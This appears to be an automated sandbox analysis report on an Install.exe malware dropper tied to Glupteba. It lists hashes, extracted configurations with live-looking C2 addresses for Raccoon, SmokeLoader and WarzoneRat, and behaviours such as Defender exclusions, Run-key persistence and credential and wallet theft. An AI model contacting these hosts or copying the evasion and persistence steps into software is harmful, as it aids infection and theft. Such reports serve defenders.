glupteba | 97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

Target

Install.exe
Size

497KB
MD5

41a5f4fd1ea7cac4aa94a87aebccfef0
SHA1

0d0abf079413a4c773754bf4fda338dc5b9a8ddc
SHA256

97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
SHA512

5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes

url4cnc
https://tttttt.me/antitantief3

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

16992cd33145ccbb6feeacb4e84400a56448fa14

Attributes

url4cnc
https://telete.in/baudemars

rc4.plain

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

warzonerat

104.207.138.207:4531

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral9/memory/2252-216-0x00000000048B0000-0x00000000051BA000-memory.dmp	family_glupteba
behavioral9/memory/2252-219-0x0000000000400000-0x00000000041D7000-memory.dmp	family_glupteba
behavioral9/memory/4236-302-0x0000000000400000-0x00000000041D7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral9/memory/4864-345-0x0000000000416232-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4176 created 2252	4176	svchost.exe	123

TelegramRat 1 IoCs

Telegram_rat.

telegram rat

resource	yara_rule
behavioral9/memory/3644-269-0x0000000010000000-0x0000000010116000-memory.dmp	Telegram_rat

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Nirsoft 2 IoCs

resource	yara_rule
behavioral9/files/0x000300000001ad42-273.dat	Nirsoft
behavioral9/files/0x000300000001ad42-274.dat	Nirsoft

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 53 IoCs

pid	Process
896	Install.tmp
3640	Ultra.exe
2464	ultramediaburner.exe
3828	ultramediaburner.tmp
1508	Cekoqaesazhy.exe
2624	UltraMediaBurner.exe
1012	ZHesupyshoxae.exe
4660	y1.exe
4644	explorer.exe
4660	y1.exe
3984	explorer.exe
3640	FCEA.exe
4724	SunLabsPlayer.exe
4444	inst.exe
4872	explorer.exe
2252	app.exe
3644	UNMqBm1lnY.exe
4720	explorer.exe
4236	app.exe
4620	8B68.exe
5000	32F3.tmp.exe
4192	A163.exe
4224	ACDE.exe
3840	B0D6.exe
4628	BC60.exe
4524	CF0F.exe
4416	D970.exe
780	E383.exe
3980	E922.exe
2880	F613.exe
3640	FCEA.exe
4400	47D.exe
5000	32F3.tmp.exe
4560	35D2.tmp.exe
5024	369E.tmp.exe
5044	data_load.exe
4108	data_load.exe
3812	Diritto.exe.com
5028	Diritto.exe.com
4992	lighteningplayer-cache-gen.exe
4520	CF0F.exe
4764	RegAsm.exe
4880	euvttjs
4380	swvttjs
1664	euvttjs
2172	8B26.exe
4232	8B26.exe
3380	euvttjs
4364	swvttjs
3304	euvttjs
2120	euvttjs
3988	swvttjs
4400	euvttjs

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Cekoqaesazhy.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat	E383.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start	E383.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ABTXu3WGb2dlGScu.exe	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ABTXu3WGb2dlGScu.exe	explorer.exe

Loads dropped DLL 64 IoCs

pid	Process
896	Install.tmp
3640	FCEA.exe
4724	SunLabsPlayer.exe
4660	y1.exe
4872	explorer.exe
4724	SunLabsPlayer.exe
4660	y1.exe
4660	y1.exe
4660	y1.exe
4660	y1.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4192	A163.exe
4192	A163.exe
4192	A163.exe
4192	A163.exe
4192	A163.exe
3980	E922.exe
3980	E922.exe
3980	E922.exe
3980	E922.exe
3980	E922.exe
3980	E922.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
1476	rundll32.exe
3728	rundll32.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4724	SunLabsPlayer.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe
4992	lighteningplayer-cache-gen.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AotYqZ = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Adobe\\Coduweshexy.exe\""	Ultra.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
123	api.myip.com
240	ip-api.com
297	eth0.me
122	api.myip.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 3984 set thread context of 3640	3984	explorer.exe	168
PID 4628 set thread context of 4864	4628	BC60.exe	159
PID 4416 set thread context of 4720	4416	D970.exe	184
PID 5024 set thread context of 4480	5024	369E.tmp.exe	195
PID 4524 set thread context of 4520	4524	CF0F.exe	234
PID 5028 set thread context of 4764	5028	Diritto.exe.com	235
PID 4880 set thread context of 1664	4880	euvttjs	238
PID 2172 set thread context of 4232	2172	8B26.exe	240
PID 3380 set thread context of 3304	3380	euvttjs	251
PID 2120 set thread context of 4400	2120	euvttjs	258

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\AotYqZ\cache.dat	rundll32.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libssp-0.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-PAOVM.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\Adobe\Coduweshexy.exe	Ultra.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	SunLabsPlayer.exe
File created	C:\Program Files\temp_files\bckf.fon	data_load.exe
File created	C:\Program Files (x86)\temp_files	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\regstr	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-KV6V3.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\uninstall.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\index.html	SunLabsPlayer.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral9/files/0x000100000001ac24-185.dat	nsis_installer_2
behavioral9/files/0x000100000001ac24-184.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	explorer.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FCEA.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euvttjs
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	swvttjs
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FCEA.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FCEA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	explorer.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	explorer.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4880	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4224	timeout.exe
4328	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4376	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4384	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	app.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1A51B7AB-9B1F-43EE-AC2B-283BBD92DB64}Machine\SOFTWARE\Policies	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	app.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{1A51B7AB-9B1F-43EE-AC2B-283BBD92DB64}USER	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	app.exe
